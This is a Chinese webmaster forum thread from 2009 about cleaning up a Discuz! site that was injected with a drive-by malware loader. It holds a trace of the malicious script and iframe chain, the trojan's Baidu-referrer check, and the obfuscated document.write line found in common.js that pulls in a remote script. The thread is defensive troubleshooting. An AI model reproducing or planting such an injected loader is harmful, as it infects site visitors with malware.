12   1  /  2  页   跳转

求助点挂马的问题

求助点挂马的问题

因为因为一直用瑞星 所以一直对360超级感冒 (个人原因)最近这几天不知道怎么搞的 www.lightwave.com.cn  只要是用360的浏览器或者那个所谓查毒的东西 就提示网站被挂马  查毒的弹出这个提示地址 URL:http://1.z88b.com/x.js    论坛详细都查过了  可还是找不到具体原因所在,已经把联盟的代码刚刚放进去了还没有结果 ~~ 希望谁能给个结论 到底怎么回事!

用户系统信息:Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
最后编辑networkedition 最后编辑于 2009-09-16 09:22:33
分享到:
gototop
 

回复:求助点挂马的问题

没人哦??
gototop
 

回复 1F 落xue无心 的帖子

被挂马了。所挂恶意链接地址:http://1.z88b.com/x.js
Log is generated by FreShow.
[wide]http://www.lightwave.com.cn/
    [script]http://www.lightwave.com.cn/include/js/common.js?maM
        [script]http://1.z88b.com/x.js
            [frame]http://oadz.9966.org/wwj/5.htm?1
                [frame]http://wm.99c342.cn/x115/xx.html
                    [frame]http://wm.99c342.cn/x115/Td14.htm
                        [script]http://wm.99c342.cn/x115/14.js
                            [object]http://d.doinw.com/xx/x115.css
                        [script]http://wm.99c342.cn/x115/15.js
                        [script]http://wm.99c342.cn/x115/17.js
                        [script]http://wm.99c342.cn/x115/16.js
                        [script]http://wm.99c342.cn/x115/18.js
                    [frame]http://wm.99c342.cn/x115/yt.htm
                    [frame]http://wm.99c342.cn/x115/td09.htm
                    [frame]http://wm.99c342.cn/x115/yut.htm
                [script]http://js.tongji.linezing.com/1242668/tongji.js
            [frame]http://oadz.9966.org/wwj/5.htm?1
            [frame]http://oadz.9966.org/wwj/5.htm?1
            [frame]http://oadz.9966.org/wwj/5.htm?1
            [frame]http://oadz.9966.org/wwj/5.htm?1
            [frame]http://oadz.9966.org/wwj/5.htm?1
            [frame]http://oadz.9966.org/wwj/5.htm?1
            [frame]http://oadz.9966.org/wwj/5.htm?1
            [frame]http://oadz.9966.org/wwj/5.htm?1
            [frame]http://oadz.9966.org/wwj/5.htm?1
            [frame]http://oadz.9966.org/wwj/5.htm?1
        [script]http://www.lightwave.com.cn/include/js/([^]*?)
    [script]http://www.lightwave.com.cn/pic.php
    [script]http://a06.insenz.com/adv?sid=58253&gid=&fid=0&tid=0&uid=0&random=dxL3
gototop
 

回复:求助点挂马的问题

这个木马做了判断,你正常访问网站的时候是不会释放的也就是没有影响。
但是当你是从搜索引擎过来的流量他就会释放。
楼主按楼上的提示去掉相关挂马代码即可!

判断的代码
var url=document.referrer;
var p=url.toLowerCase().indexOf("www.baidu.com");
最后编辑跑步的鱼儿 最后编辑于 2009-09-16 11:00:56
gototop
 

回复:求助点挂马的问题

谢谢  找找看 到底怎么解决~    找了2天了 就是不知道会在那个文件里面 很纳闷 搞不清楚
最后编辑落xue无心 最后编辑于 2009-09-16 10:39:43
gototop
 

回复:求助点挂马的问题

查一下 你的文件那些被修改了 主要是css  js文件!
主要是要定位漏洞 防止再次被挂马!
gototop
 

回复:求助点挂马的问题

我也是比较菜刚开始搞论坛 正在找  另外我发现这两天又有网站出现这问题了什么也找不出来  我在尝试联系那个网站的站长 看看怎么情况吧 DZ官方也有人发帖出来关于这个了 还没引起重视
gototop
 

回复:求助点挂马的问题

找不出来 到底在那个文件夹里面 超级郁闷了~~谁知道会大概在什么地方???
最后编辑落xue无心 最后编辑于 2009-09-16 11:26:23
gototop
 

回复:求助点挂马的问题

[script]http://www.lightwave.com.cn/include/js/common.js?maM
是这个吧
gototop
 

回复:求助点挂马的问题

document.write("<script src=http://1.%7A%38%38%62%2E%63%6F%6D/x.js></script>");
function setcookie(cookieName, cookieValue, seconds, path, domain, secure) {
    var expires = new Date();
    expires.setTime(expires.getTime() + seconds * 1000);
    domain = !domain ? cookiedomain : domain;
    path = !path ? cookiepath : path;
    document.cookie = escape(cookieName) + '=' + escape(cookieValue)
        + (expires ? '; expires=' + expires.toGMTString() : '')
        + (path ? '; path=' + path : '/')
        + (domain ? '; domain=' + domain : '')
        + (secure ? '; secure' : '');
是这个吗?
gototop
 
12   1  /  2  页   跳转
页面顶部
Powered by Discuz!NT